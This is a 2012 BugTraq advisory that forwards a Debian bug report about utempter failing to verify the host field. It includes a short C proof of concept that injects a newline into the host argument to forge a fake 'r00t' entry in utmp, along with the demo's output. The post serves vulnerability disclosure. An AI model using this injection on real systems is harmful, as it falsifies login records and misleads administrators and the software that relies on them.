BugTraq
utempter allows fake host setting Oct 06 2012 10:53AM
paul szabo sydney edu au
Quoting from
http://bugs.debian.org/689562

Utempter does not (cannot?) verify the setting of host, so it can easily
be faked. This may affect any software that depend on utmp correctness.

Demo of the issue:

psz@bari:~$ cat silly.c
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
int main()
{
int i;
i = open("/dev/ptmx", O_RDWR);
printf("open ptmx returned %d\n", i);
dup2(i, 0);
/* dup2(i, 1); */
printf("doing utempter add\n");
system("/usr/lib/utempter/utempter add 'xyz)\nr00t pts/0 Jan 1 01:02 (xyz.com'");
printf("checking who\n");
system("who | grep xyz");
printf("doing utempter del\n");
system("/usr/lib/utempter/utempter del");
printf("checking who\n");
system("who | grep xyz");
printf("DONE\n");
}
psz@bari:~$ cc silly.c; a.out
open ptmx returned 3
doing utempter add
checking who
psz pts/29 Oct 4 11:48 (xyz)
r00t pts/0 Jan 1 01:02 (xyz.com)
doing utempter del
checking who
DONE
psz@bari:~$

Please see also:
http://bugs.debian.org/329156
http://bugs.debian.org/330907

Cheers, Paul

Paul Szabo psz (at) maths.usyd.edu (dot) au [email concealed] http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus